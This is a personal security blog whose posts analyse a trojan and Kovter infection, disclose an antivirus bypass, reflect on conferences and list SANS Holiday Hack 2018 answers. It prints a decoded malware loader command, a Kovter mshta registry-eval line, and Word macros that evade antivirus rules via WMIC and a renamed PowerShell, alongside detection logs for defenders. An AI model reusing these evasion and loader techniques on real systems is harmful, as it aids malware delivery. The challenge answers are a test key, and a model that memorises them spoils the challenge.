Monday, October 14, 2019

UPDATE: Vulnerability Vendor Plugin Oops!

Saw an encoded Powershell command that looked suspicious in the Windows Event logs.  If you defend at all - looking at Process Creation Events (4688) is quite useful.

cmd /c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand "IAAkAHMAZQByAHYAaQBjAGUAIAA9ACAAKABHAGUAdAAtAFcATQBJAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUwBlAHIAdgBpAGMAZQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAC0AUAByAG8AcABlAHIAdAB5ACAATgBhAG0AZQAgAC0AbABpAGsAZQAgACcAbQBhAHMAdgBjACcAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAE4AYQBtAGUALAAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQAsACAAUwB0AGEAcgB0AGUAZAAsACAAUwB0AGEAdABlACkADQAKAA0ACgAkAGEAZwBlAG4AdAAgAD0AIAAoAEcAZQB0AC0AVwBNAEkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBkAHUAYwB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABOAGEAbQBlACAALQBsAGkAawBlACAAJwBNAGMAQQBmAGUAZQAgAEEAZwBlAG4AdAAnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIABOAGEAbQBlACwAIABWAGUAcgBzAGkAbwBuACkADQAKAA0ACgANAAoAaQBmACAAKAAhACQAcwBlAHIAdgBpAGMAZQAgAC0AbwByACAAIQAkAGEAZwBlAG4AdAAgACkAIAB7AA0ACgANAAoAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBIAEIAUwBTACAAaQBzACAAbgBvAHQAIABpAG4AcwB0AGEAbABsAGUAZAAnACAAIAANAAoAfQANAAoADQAKAA0ACgBlAGwAcwBlAGkAZgAgACgAJABzAGUAcgB2AGkAYwBlAC4AUwB0AGEAdABlACAALQBlAHEAIAAnAFIAdQBuAG4AaQBuAGcAJwAgAC0AQQBuAGQAIAAkAHMAZQByAHYAaQBjAGUALgBTAHQAYQByAHQAZQBkACAALQBlAHEAIAAnAFQAcgB1AGUAJwAgAC0AQQBuAGQAIAAkAGEAZwBlAG4AdAAuAHYAZQByAHMAaQBvAG4AIAAtAGcAZQAgACcANAAnACkAIAB7ACAADQAKAA0ACgAgACAAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEgAQgBTAFMAIABpAHMAIABpAG4AcwB0AGEAbABsAGUAZAAgAGEAbgBkACAAcgB1AG4AbgBpAG4AZwAnACAADQAKAA0ACgB9ACAADQAKAA0ACgBlAGwAcwBlAGkAZgAgACgAJABzAGUAcgB2AGkAYwBlAC4AUwB0AGEAdABlACAALQBuAGUAIAAnAFIAdQBuAG4AaQBuAGcAJwAgAC0AbwByACAAJABzAGUAcgB2AGkAYwBlAC4AUwB0AGEAcgB0AGUAZAAgAC0AZQBxACAAJwBGAGEAbABzAGUAJwApACAAewANAAoADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcASABCAFMAUwAgAGkAcwAgAG4AbwB0ACAAcgB1AG4AbgBpAG4AZwAnAA0ACgANAAoAfQANAAoADQAKAGUAbABzAGUAIAB7ACAADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAUwBvAG0AZQB0AGgAaQBuAGcAIABlAGwAcwBlACAAaQBzACAAdwByAG8AbgBnACcADQAKAH0AIAA="

Deleted the last part - kind of sensitive, but not greatly - looks like this is part of a plugin for a popular vulnerability scanning tool.  Decoding it decodes to this:

$service = (Get-WMIObject Win32_Service -ErrorAction Stop | Where-Object -Property Name -like 'masvc' | Select-Object Name, DisplayName, Started, State)
$agent = (Get-WMIObject Win32_Product -ErrorAction Stop | Where-Object -Property Name -like 'McAfee Agent' | Select-Object Name, Version)
if (!$service -or !$agent ) {
    Write-Host 'HBSS is not installed'  
}
elseif ($serviceState -eq 'Running' -And $serviceStarted -eq 'True' -And $agentversion -ge '4') { 
    Write-Host 'HBSS is installed and running' 

elseif ($serviceState -ne 'Running' -or $serviceStarted -eq 'False') {
    Write-Host 'HBSS is not running'
}
else {
    Write-Host 'Something else is wrong'


Notice how some of the variables aren't defined?  This happens from time to time.  We're so excited about finding out a cool way to do something that we might forget a step or two.  Not judging the person that created this.  I'm not perfect myself.

This might fix it.

$service = (Get-WMIObject Win32_Service -ErrorAction Stop | Where-Object -Property Name -like 'masvc' | Select-Object Name, DisplayName, Started, State)

$agent = (Get-WMIObject Win32_Product -ErrorAction Stop | Where-Object -Property Name -like 'McAfee Agent' | Select-Object Name, Version)


$serviceState = $service.State

$serviceStarted = $service.Started
$agentversion = $agent.Version

if (!$service -or !$agent ) {
Write-Host 'HBSS is not installed' -ForegroundColor Red}
elseif (($serviceState -eq "Running") -and ($serviceStarted -eq "True") -and ($agentversion -ge "4")) {
Write-Host 'HBSS is installed and running' -ForegroundColor Green
}
elseif (($serviceState -ne "Running") -or ($serviceStarted -eq "False")) {
Write-Host 'HBSS is not running' -ForegroundColor Red
}
else {Write-Host 'Something else is wrong' -ForegroundColor Red}



*Yes, I'm running a test instance of McAfee - they have easy to get eval versions.*

I did disclose it to the vendor.  The vendor hasn't fixed it, yet.  Keep in mind, I literally just disclosed it.

Maybe if enough people mention it, it will be put higher in the priority list, though.  I turned this in to help the community.  Shouldn't be difficult to figure out which vendor this belongs to.  Not mentioning the specific vendor by name in case it gets me or them in trouble.  

After looking at the scan details, I know the plugin as well.  Afraid to mention it because whoever put it out there had good intentions.  We all have less than ideal days.  Maybe they will recognize their own code and submit a fix.

If someone can think of a better fix and can figure out who the vendor is, please, tell them.  Thanks.

UPDATE:  They have notified me that this should be fixed now and asked to test it.

Wednesday, September 25, 2019

Powershell Encoded Payload In Clear Text in Windows Event Log 4688

Found something kind of interesting that analysts might want to be aware of.

For months, there's this device that kept trying to execute a Powershell payload.  I could see it in the logs of a well-known vendor.  At first it looks like this because this vendor decided everything should be in caps.

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ENCODEDCOMMAND JAB3AD0AJABLAG4ADGA6AEEAUABQAEQAQQBUAEEAKWANAFWAQGBYAG8ADWBZAGUACGAGAEEACWBZAGKACWB0AGEABGB0AFWAJWA7AFSAUGBLAGYABABLAGMADABPAG8ABGAUAEEACWBZAGUABQBIAGWAEQBDADOAOGBMAG8AYQBKACGAWWB

I put in a request for them to allow that field to be upper/lower case.  So then I see this:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JAB3AD0AJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAKwAnAFwAQgByAG8AdwBzAGUAcgAgAEEAcwBzAGkAcwB0AGEAbgB0AFwAJwA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwB

The payload decodes to this:

$w=$env:APPDATA+'\Browser Assistant\';[ReflectionAssembly]::Load([

This vendor truncates the payload. >:(
 
I Google it - thinking I might get lucky.  It's a Browser Assistant Trojan.  https://blog.malwarebytes.com/detections/trojan-browserassistant-ps/
 
Sometimes it's hard to believe something is infected, especially if this AV solution keeps saying that it's blocking it.  I kept looking for the encoded command in Powershell logs 4103 and 4104 - no luck.
 
Found out that If I did this:  Get-WinEvent -FilterHashtable @{logname="Security";id="4688";} | Select -Expand Message | ?{$_ -like "*powershell*"} | ?{$_ -like "*Reflection*"}, I found it.  It was in clear text!  The examples on security blogs show it in it's encoded forms.  I've seen it in the logs as encoded text before.  Why is this one different?

I assume it was in clear text because when that payload was loaded into memory, it was decoded.  The event 4688 in the Security log is for process creation.  The process was actually created.  It's weird because the AV solution said it blocked it.  This has been going on since June, and I finally have proof that there's a problem.  I could try to clean it up, because I have the IOCs in that article, but the IOCs change all the time.  You'll see that the actual decoded payload doesn't match what's in that article.  It loads a specific version of .NET for starters.  The actual decoded payload is this:
 
powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c "$env:COMPLUS_version='v4.0.30319';&powershell{$w="$env:APPDATA"+'\Browser Assistant\';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Updater.dll'));$i=new-object u.U;$i.ST()}"

I haven't found what keeps starting this.  Looks like I'll have to keep looking.

###Update####

Been a while since I touched this blog.  I've been so busy with cyber defense, ctfs, holiday hack.  Never thought that this would be my job, but it is.  Sometimes I feel a little over my head.  I wanted to revisit this for a while.  I did find out what was causing it to execute over a year ago.  The process that kept launching this was a variant of Kovter.  https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless

Found some other indicators and an obfuscated binary in the registry.

"C:\Windows\system32\mshta.exe" "javascript:Bsyy7="qq";eV70=new ActiveXObject("WScript.Shell");oe1OXyOm="S";Vcd8A8=eV70.RegRead("HKCU\\software\\fcscgkz\\flwxqgajf
l");G9MfLbiK="4zxH6zWh";eval(Vcd8A8);ul2pbt5YT="UmUVk8mV";" <--this kept running over and over again.

HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Wallpapers
Name: Images <base64encoded binary>

HKLM:\Software\fcscgkz
lqje: <obfuscated binary> - This isn't base64 encoded.  Trust me, you'll know if you see it.  It looks random.
flwxqgajfl: <base64 encoded strings><bunch of hex that looks like shell code.>
uzksi: S6xXx9mdNmjlJA==
ppaj: Q/cIl47JZi1rc8ijJL1FKrCPtHaJv7U=
ggxo: E/BWwN7BYJWCwSskHqL/kjk=
boadvfk: FqcLk4zANi4kDWir28Afgte9/ujOKjBjpDNsCg5OyaP7nnOuSgzYVDskh2OyNaD1KtQqcCIosyWWjkLoFIwTMnlSD1c=
fthhhtkk:<base64 encoded binary>
oass: <base64 encoded binary>
3ecf9d7c3f: what looks like an array of decimals.  Might be byte code or characters in decimal form.

I would hazard a guess that those keys are probably randomized, so they might not look the same from sample to sample.











Tuesday, September 24, 2019

AV Bypass

Found a way to bypass a well-known Enterprise AV solution a while ago.  I'm afraid to disclose it to anyone other than the vendor.  I disclosed it to that particular vendor, and they haven't quite solved the problem, yet.  I don't want to cause anyone any undue hardship from disclosing this particular vulnerability, but it's probably already well-known.  The difficulty in solving this is that the way to bypass this AV uses Windows built-in tools and it produces a lot of false positives.  This vendor thought that they had a solution in a signature update, but it didn't cover the wide variety of ways that this particular Windows built-in tool could be used.  I'm horrified by this, but not exactly surprised.  This is why defense in depth is so vitally important.  Where one solution fails, another will succeed.  I wish I could say more.  I can't quite figure out how it works.  I'm scratching my head because it shouldn't work.  I put protections in place by making custom rules, and it's not firing on any of the custom rules even though it should.  Thought I had an idea of why.  That was proven to be wrong.  Wish I could figure this out because if I found it, I'm fairly certain the bad guys have probably already found it.  I guess I can release the exploit.  Someone will figure out who the vendor is.  I just hope that by releasing this, a fix can be made.  Some of you will say, "Well, Emotet does that..."  You're right - but does it do it in this exact way?  Emotet was what inspired me to try this.  And yes, I know, this isn't l33t.

Create a macro in Word and add this technique:

Sub Auto_Open()
'
' Auto_Open Macro
'
'
Shell ("wmic process call create 'powershell.exe chrome.exe https://www.youtube.com/watch?v=dQw4w9WgXcQ'")
End Sub


Here's another one bypassing a custom rule telling my AV solution not to allow winword.exe to run powershell.exe by copying powershell.exe to my Desktop and renaming it to dog.exe

Sub Auto_Open()
'
' Auto_Open Macro
'
'
Shell ("C:\Users\Bob\Desktop\dog.exe Start-Process chrome.exe 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'")
End Sub

Showing these as well - Windows Events - to help detect this.

Process Create:
UtcTime: 2019-09-23 20:47:36.217
ProcessGuid: {}
ProcessId: 22412
Image: C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE
CommandLine: "C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE" /n "C:\Users\BOB\Downloads\Bob.docm" /o ""

CurrentDirectory: C:\WINDOWS\system32\
User: BOB\BOB
LogonGuid: {}
LogonId:
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=
ParentProcessGuid: {}
ParentProcessId: 7088
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: "C:\Windows\explorer.exe" /LOADSAVEDWINDOW

Process Create:
UtcTime: 2019-09-23 20:47:39.828
ProcessGuid: {}
ProcessId: 1136
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe Start-Process chrome.exe https://youtu.be/dQw4w9WgXcQ
CurrentDirectory: c:\windows\system32\spool\drivers\x64\3\
User: BOB\BOB
LogonGuid: {}
LogonId:
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=
ParentProcessGuid: {}
ParentProcessId: 6868
ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
ParentCommandLine: C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding

Saturday, September 7, 2019

Final Derbycon?

Can't believe it's the end.  Only 2nd year that I've gone.  Never expected to go, but turns out that my boss really likes this con, and I can see why.  Plenty of people are nice, and friendly.  I posted about awkwardness really early yesterday morning, but that was my personal problem, not the problem of others.

Only thing was a vendor who was a little rude, but that's not Derby's fault.  That reflects badly on his company.  I tweeted about it.   Also, I'm not saying he's the devil incarnate.  Seems obvious to me that I was there to look at the product, but maybe he didn't realize.  It's possible.

This week has been a huge dose of humble pie.  It's yet again confirmed that I still need to learn so much.  Yeah, I know, shocker.  I'd like to try to get an OSCP someday- mostly just to see if it's possible.

Had Practical Burp:  Advanced Techniques (PBAT) training this week - it's from here:  https://www.lanmaster53.com/training/.  He was offering it at Derbycon, and in the ticket race, that's what my boss could get.  Strangely enough, it does kind of mesh with my job.  I really need to study how common web apps work if I really want to get the most out of that training.  I know the basics - OWASP Top 10, some of what they mean, and some about how they work, but in order to execute them properly, I need to know the underpinnings of the apps.  What weird caveats does each language have that I can leverage?  Kind of like the weird php comparison operators - or that you can use variables without the $ sign in some cases. 

I tried the Derbycon CTF.  It's meant for beginner up, but there's not really a lot of guidance to it.  You get a scope of IPs and have at it.  I figured out some of it, but if it's any indication of my skills, I could use some more practice.  I did learn something new, though, so that was cool.  Almost gave up on the CTF.  The Wireless connection was slow.  Some machines that were up weren't showing as up.  Some kept going down right after they said that they were up.  That was a little bit of a nightmare.  Glad that I didn't give up though - considering I learned something.  I think that this was good practice to expect for the OSCP.  I hear you get study material, you study it so long, then you have to try to pwn a certain number of machines in 24 hours and you write a report in that time.  I hear most people don't pass it first time around.  I'm a little afraid to try a first time because what if I never pass it?   I guess I should think like that movie - "If I can't go on, I'll go on"?

Both concerts were awesome.  I'm so glad I went.  Discovered new music that I like.  It's by Infected Mushroom.  Didn't know who they were before attending.

Signed a Trevor memorial card.  That was so fun watching that escalate 3 years ago on Twitter - then to see the memorial last year, and the memorial this year.  Trevor will always be in our hearts. :D  #trevorforget

I'm going to miss Derby.  It just started for me, but the impact it's had...  I hope someone tries to bring it back.

The Spark

3:30AM.  Going to be really tired in the morning.  Having trouble sleeping.  One of Trevor's family members is in my hotel room - not sure how it got in here, but the things freak me out.  Sometimes you can be surrounded by people and feel lonelier than ever.  I wish I had that spark.  You know, the ease that some people have relating to each other and having conversations with each other.  I'd like to be positive and inspirational all the time, but I just can't be.  Not when I don't feel positive or inspirational.  Trying to enjoy the last Derbycon as much as I can, but it's not easy.  When I'm in huge groups, I just feel like I take up too much space.  I try to shy away from people.  I'm awkward when I talk to people as well.  I have plenty going on in my head, but not much to say.  And I keep saying the dumbest things.  Someone I look up to actually said, "Hi" to me.  (I'm still surprised when people I look up to say "Hi" to me.)  I said something and I guess he didn't get the reference, or he thinks I'm weird - maybe both.  I am weird, but that's besides the point.  I was referencing a movie I really like, an old black and white film, and he'd talked about having conversations with imaginary people/figures and well, that's what the movie was about.  I realized that it could be taken offensively.  The guy in the movie drank a lot and people thought that he was insane.  I doubt that this particular person reads my blog/journal, but if he does, I did not mean to offend you.  I apologize.

Feels like I'm always saying sorry for something.  Constant foot in my mouth type problem.  Just for future reference, if I say something offensive, I'm usually not intending to be offensive.  I just don't realize it's offensive until later.  I blame part of this on my upbringing.  I'd rather not get into personal details, but suffice it to say, it wasn't the best. 

At least I felt better in the concert.  That was loud enough that I didn't have to talk to anyone. 

This social stuff is why I prefer writing and singing oddly enough.  I don't have to immediately send out what comes into my head.  I can reflect on it and consider how other's might interpret it before sending it out.  As for singing, I believe I've mentioned this before, it's someone else's words, and people tend to look past your appearance if they think you have an ok voice.  It doesn't even have to be a mediocre voice - just generally pleasant. 

I'm writing this because this is kind of a journal to me - not really something I expect people to read.  But if they do, it's not a big deal.  The issue I have with myself, is my mind.  Most people I say stupid or weird things to probably don't dwell on what I said, they probably think, "OK, she's a little weird", and they move on.  But I replay the dumb things.  Kind of the "Dumbest Things I've Said Playlist". 

If I was giving advice to someone, I'd tell them to not dwell on this.  Seems like I need to take my own advice sometimes.  If someone actually does read this, if you're wondering, "If being around crowds gives you such anxiety, then why go?"  I won't be successful with a social roadblock.  If no one knows who I am, how can they trust me enough to hire me, be my friend, or my mentor?  So, what do you do?  Mingle - just try not to be weird like me.

Sunday, July 28, 2019

So You Aren't the Smartest Person In the Room

Haven't written in a while... been busy with life.  I had an awesome opportunity.  I was invited to the NetWars Tournament of Champions in Berlin.  Problem was that that kind of trip was a bit expensive for me.  Mostly because of the flight.  Somehow I was lucky and it worked out that they needed a facilitator.  So, I did SANS training at a discounted price, and came to Berlin.

Being a facilitator for SANS EMEA is a bit more involved than the US one.  We had to run network cables for our rooms, set up the books and supplies in each room on the desks in a neat orderly fashion and put the bags on the seat backs, make sure that our instructors had a speaker set up to play music, a speaker set up for his wireless mic, a projector or a screen, we had to set up the cabling/network the rooms if we had a wired setup, and we had to set up the cabling/network for NetWars.  (I was glad that this seemed to be ok.  Few hiccups here and there, but better than expected.  I was so worried something would go wrong.)

I'm so glad that in the US, SANS has the AV team to help with setting up stuff.  I appreciate them; even more now.  Thanks for all you do, you unsung heroes.

I took SANS SEC617:  Wireless Pen Testing and Ethical Hacking - have I ever done this.  Nope.  Do I know much about wireless tech?  Nope.

The above isn't exactly what I intended to write about today, though.  Kind of worried about writing this - what people would think.  But I think others feel like this, so it might be helpful.

TLDR:  When you don't know everything, which pretty much includes everyone, do your best to help in the ways that you can.  That's good enough.  :) 

I'm not the smartest person in the room.  Not by a long shot.  Sometimes I wonder why I'm here.  As in why am I in information security?  Do I deserve to be here?  People always tell me, "It's imposter syndrome."  Saying it's imposter syndrome doesn't help take away the feeling.  Also, what if I'm right?  What if I'm not an imposter?  What if I really don't know all that much?  I know enough to know that I need to learn more.  I don't consider myself "expert" in anything.  People act like it's bad for me to doubt myself.  Is it really bad to feel this way considering it gives me a drive to learn more?

I was feeling overwhelmed this week because this class covers something I've never done before.  I also missed some of class because of my Facilitator duties.  (This happens from time to time, but that's why they give us OnDemand.)  So I was feeling a little down all week - very much doubting myself.  (Also, I know that this sounds stupid, but I've gotten cold sores for as long as I can remember, so I was feeling down by that as well.  I'm so embarrassed by them.  Sure, I can't help it that they come on, but they bother me.  I try my best to keep my hands away from my face, and to keep my hands clean because I wouldn't be able to deal with it if I accidentally infect someone.  There are antivirals and such, but I find that they don't help with mine.  I have no idea how to cover them either - I don't wear makeup or anything.  I know - stupid thing to be worried about, but that's me...)

Day 6 Challenge was today.  I'm choked big time.  Thankfully I had some really talented members on my team that picked up the slack.   I recovered my brain enough sometime in the day to answer a couple of flags.  Even when I was choking, I didn't give up.  I kept trying.  Maybe I couldn't help in the way that I wanted, but I found information in our books to help solve some of the puzzles and shared them with my team.  Sure, maybe they already knew that, but maybe not.  (We weren't talkative - if I have any advice for teams - talk it out.)  I tried to be helpful where I could.

The point I actually want to make.  It's ok not to be the smartest person in the room.  I can't quit or stop trying just because someone is smarter than me.  (Well, I can, but it wouldn't exactly be helpful to me or others.)  I have an example to set for my children.  How do I want them to react when they feel this way?  I want to be a good example for them.  Here's what I'm telling myself, so my children and maybe others can learn this from me.  There may always be people that are smarter than you are.  That's ok.  We all have strengths and weaknesses.  You're stronger when you help lift other people up, and you're not afraid to learn from ANYONE.  Yes, literally anyone.  That means not being afraid to ask for help when it's needed.  So, I'm not awesome at wireless pen testing, YET, but I can learn from those who are and get better, in exchange, maybe they could learn something from me, or maybe they just simply feel better about themselves for helping someone else out.  And I can't even say that I'm not good wireless pen testing because I've never actually tried until now.  Who says I can't learn it?  A one-week course isn't going to teach me all the ends/outs of wireless technology.  Don't give up before you've had the chance to put in a good effort.  (I'm amazed that I did actually learn stuff in class this week.  It was the implementation of those things that I was having trouble with.  But, I learned from that failure - probably more than if I would've been successful.  This is all that matters.  If you get into info sec, get used to failures - exploits - and WEP cracking - lolz - apparently - don't always work.) 

Even if I never get awesome at wireless pen testing, is that ok?  Yes, because I'm good at other things; like inspiring and encouraging others.  Maybe when they're feeling like they can't go on, one inspiring message keeps them going.   Even though I talk a lot about me;  it's not about me.  There are teams for a reason.  Where someone is weak, others can pick up the slack.  Even if someone is strong, even they don't know everything.  Everyone's ideas give the inspiration needed to solve the puzzles.

I know that this message seems a bit simple, but sometimes that's what people need.

Saturday, February 2, 2019

Tribe of Hackers

Saw a tweet by Marcus J. Carey about a book called Tribe of Hackers that was co-written with Jennifer Jin.  Adding a link to their blog post to get the free pdf.  I’m also purchasing the book as well.

I love that they’re releasing the book for free for those who can’t afford it.

I haven’t told my whole story, but I had it tough growing up.  I originally didn’t even consider a career in IT because I felt I wasn’t intelligent enough, but also because I couldn’t afford it.

It’s awesome to see that someone is not only willing to spend their time mentoring others, but they are also giving this book for free to those who need it the most.  Please purchase the book if you can, and spread the word about it.  Thanks to Marcus Carey and Jennifer Jin for mentoring others and giving them this gift.

Without further ado, here’s the link:  https://www.threatcare.com/tribe-of-hackers-free-pdf/

Tuesday, January 15, 2019

SANS Holiday Hack 2018 - Storyline Questions and Answers

As you walk through the gates, a familiar red-suited holiday figure warmly welcomes all of his special visitors to KringleCon.
Welcome, my friends! Welcome to my castle! Would you come forward please?

Welcome. It’s nice to have you here! I’m so glad you could come. This is going to be such an exciting day!
I hope you enjoy it. I think you will.
Today is the start of KringleCon, our new conference for cyber security practitioners and hackers around the world.
KringleCon is designed to share tips and tricks to help leverage our skills to make the world a better, safer place.
Remember to look around, enjoy some talks by world-class speakers, and mingle with our other guests.
And, if you are interested in the background of this con, please check out Ed Skoudis’ talk called START HERE.
Delighted to meet you. Overjoyed! Enraptured! Entranced! Are we ready? Yes!  In we go!


Question 1:
What phrase is revealed when you answer all of the KringleCon Holiday Hack History questions? For hints on achieving this objective, please visit Bushy Evergreen and help him with the Essential Editor Skills Cranberry Pi terminal challenge.
Answer: Happy Trails

Question 2:
Who submitted (First Last) the rejected talk titled Data Loss for Rainbow Teams: A Path in the Darkness? Please analyze the CFP site to find out. For hints on achieving this objective, please visit Minty Candycane and help her with the The Name Game Cranberry Pi terminal challenge.
Answer: John McClane

Question 3:
The KringleCon Speaker Unpreparedness room is a place for frantic speakers to furiously complete their presentations. The room is protected by a door passcode. Upon entering the correct passcode, what message is presented to the speaker? For hints on achieving this objective, please visit Tangle Coalbox and help him with the Lethal ForensicELFication Cranberry Pi terminal challenge.
Answer: Welcome unprepared speaker!

Suddenly, all elves in the castle start looking very nervous. You can overhear some of them talking with worry in their voices.
The toy soldiers, who were always gruff, now seem especially determined as they lock all the exterior entrances to the building and barricade all the doors. No one can get out! And the toy soldiers' grunts take on an increasingly sinister tone.
Grunt!


Question 4:
Retrieve the encrypted ZIP file from the North Pole Git repository. What is the password to open this file? For hints on achieving this objective, please visit Wunorse Openslae and help him with Stall Mucking Report Cranberry Pi terminal challenge.
Answer: Yippee-ki-yay


In the main lobby on the bottom floor of Santa's castle, Hans calls everyone around to deliver a speech.


Ladies and Gentlemen…
Ladies and Gentlemen…
Due to the North Pole’s legacy of providing coal as presents around the globe they are about to be taught a lesson in the real use of POWER.
You will be witnesses.
Now, Santa… that's a nice suit… John Philips, North Pole. I have two myself. Rumor has it Alabaster buys his there.
I have comrades in arms around the world who are languishing in prison.
The Elvin State Department enjoys rattling its saber for its own ends. Now it can rattle it for ME.
The following people are to be released from their captors.
In the Dungeon for Errant Reindeer, the seven members of the New Arietes Front.
In Whoville Prison, the imprisoned leader of ATNAS Corporation, Miss Cindy Lou Who.
In the Land of Oz, Glinda the Good Witch.


Question 5:
Using the data set contained in this SANS Slingshot Linux image, find a reliable path from a Kerberoastable user to the Domain Admins group. What’s the user’s logon name (in username@domain.tld format)? Remember to avoid RDP as a control path as it depends on separate local privilege escalation flaws. For hints on achieving this objective, please visit Holly Evergreen and help her with the CURLing Master Cranberry Pi terminal challenge.
Answer: LDUBEJ00320@AD.KRINGLECASTLE.COM

The toy soldiers continue behaving very rudely, grunting orders to the guests and to each other in vaguely Germanic phrases.
Links.
Nein! Nein! Nein!
No one is coming to help you.
Get the over here!
Schnell!
Suddenly, one of the toy soldiers appears wearing a grey sweatshirt that has written on it in red pen, "NOW I HAVE A ZERO-DAY. HO-HO-HO."
A rumor spreads among the elves that Alabaster has lost his badge. Several elves say, "What do you think someone could do with that?”


Question 6:
Bypass the authentication mechanism associated with the room near Pepper Minstix. A sample employee badge is available. What is the access control number revealed by the door authentication panel? For hints on achieving this objective, please visit Pepper Minstix and help her with the Yule Log Analysis Cranberry Pi terminal challenge.
Answer: 19880715

Hans has started monologuing again.
So, you’ve figured out my plan – it’s not about freeing those prisoners.
The toy soldiers and I are here to steal the contents of Santa’s vault!
You think that after all my posturing, all my little speeches, that I’m nothing but a common thief.
But, I tell you -- I am an exceptional thief.
And since I've moved up to kidnapping all of you, you should be more polite!


Question 7:
Santa uses an Elf Resources website to look for talented information security professionals. Gain access to the website and fetch the document C:\candidate_evaluation.docx. Which terrorist organization is secretly supported by the job applicant whose name begins with "K"? For hints on achieving this objective, please visit Sparkle Redberry and help her with the Dev Ops Fail Cranberry Pi terminal challenge.
Answer: Fancy Beaver

Great work! You have blocked access to Santa's treasure... for now.
And then suddenly, Hans slips and falls into a snowbank. His nefarious plan thwarted, he's now just cold and wet.


Question 8:
Santa has introduced a web-based packet capture and analysis tool to support the elves and their information security work. Using the system, access and decrypt HTTP/2 network activity. What is the name of the song described in the document sent from Holly Evergreen to Alabaster Snowball? For hints on achieving this objective, please visit SugarPlum Mary and help her with the Python Escape from LA Cranberry Pi terminal challenge.
Answer: Mary Had a Little Lamb

Question 9:
Alabaster Snowball is in dire need of your help. Santa's file server has been hit with malware. Help Alabaster Snowball deal with the malware on Santa's server by completing several tasks. For hints on achieving this objective, please visit Shinny Upatree and help him with the Sleigh Bell Lottery Cranberry Pi terminal challenge.  Assist Alabaster Snowball by accessing the Snort terminal in Kringle Castle.  What is the success message displayed by the Snort terminal?
Answer: Snort is alerting on all ransomware and only the ransomware!

Thank you so much! Snort IDS is alerting on each new ransomware infection in our network.
Hey, you're pretty good at this security stuff. Could you help me further with what I suspect is a malicious Word document?
All the elves were emailed a cookie recipe right before all the infections. Take this document with a password of elves and find the domain it communicates with.


Question 10:
After completing the prior question, Alabaster gives you a document he suspects downloads the malware. What is the domain name the malware in the document downloads from?
Answer: erohetfanu.com

Erohetfanu.com, I wonder what that means?
Unfortunately, Snort alerts show multiple domains, so blocking that one won't be effective.
I remember another ransomware in recent history had a killswitch domain that, when registered, would prevent any further infections.
Perhaps there is a mechanism like that in this ransomware? Do some more analysis and see if you can find a fatal flaw and activate it!


Question 11:
Analyze the full malware source code to find a kill-switch and activate it at the North Pole's domain registrar HoHoHo Daddy.
What is the full sentence text that appears on the domain registration success message (bottom sentence)?
Answer: Successfully registered yippeekiyaa.aaay!

Yippee-Ki-Yay! Now, I have a ma... kill-switch!
Now that we don't have to worry about new infections, I could sure use your L337 security skills for one last thing.
As I mentioned, I made the mistake of analyzing the malware on my host computer and the ransomware encrypted my password database.
Take this zip with a memory dump and my encrypted password database, and see if you can recover my passwords.
One of the passwords will unlock our access to the vault so we can get in before the hackers.


Question 12:
After activating the kill-switch domain in the last question, Alabaster gives you a zip file with a memory dump and encrypted password database. Use these files to decrypt Alabaster's password database. What is the password entered in the database for the Vault entry?
Answer: ED#ED#EED#EF#G#F#G#ABA#BA#B

You have some serious skills, of that I have no doubt.
There is just one more task I need you to help with.
There is a door which leads to Santa's vault. To unlock the door, you need to play a melody.


Question 13:
Use what you have learned from previous challenges to open the door to Santa's vault. What message do you get when you unlock the door?
Answer: You have unlocked Santa's vault!

Having unlocked the musical door, you enter Santa's vault.
I'm seriously impressed by your security skills!
How could I forget that I used Rachmaninoff as my musical password?
Of course I transposed it it before I entered it into my database for extra security.
Alabaster steps aside, revealing two familiar, smiling faces.


It’s a pleasure to see you again.
Congratulations.
You DID IT! You completed the hardest challenge. You see, Hans and the soldiers work for ME. I had to test you. And you passed the test!
You WON! Won what, you ask? Well, the jackpot, my dear! The grand and glorious jackpot!
You see, I finally found you!
I came up with the idea of KringleCon to find someone like you who could help me defend the North Pole against even the craftiest attackers.
That’s why we had so many different challenges this year.
We needed to find someone with skills all across the spectrum.
I asked my friend Hans to play the role of the bad guy to see if you could solve all those challenges and thwart the plot we devised.
And you did!
Oh, and those brutish toy soldiers? They are really just some of my elves in disguise.
See what happens when they take off those hats?


Santa continues:
Based on your victory… next year, I’m going to ask for your help in defending my whole operation from evil bad guys.
And welcome to my vault room. Where's my treasure? Well, my treasure is Christmas joy and good will.
